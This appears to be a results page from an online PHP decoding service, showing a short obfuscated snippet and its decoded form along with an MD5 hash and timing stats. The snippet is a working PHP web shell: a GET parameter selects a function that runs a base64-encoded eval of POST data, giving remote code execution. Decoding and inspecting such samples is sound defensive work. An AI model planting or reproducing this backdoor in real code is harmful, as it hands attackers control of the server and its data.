Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(key($_GET)=='dede') call_user_func($_GET['dede'], base64_decode('QG..
Decoded Output download
<?php
if(key($_GET)=='dede')
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Did this file decode correctly?
Original Code
<?php
if(key($_GET)=='dede')
call_user_func($_GET['dede'], base64_decode('QGV2YWwoJF9QT1NUW2JzXSk7'));
?>
Function Calls
key | 1 |
Stats
MD5 | 5c19230fbd00ee1d73969d35287712f9 |
Eval Count | 0 |
Decode Time | 81 ms |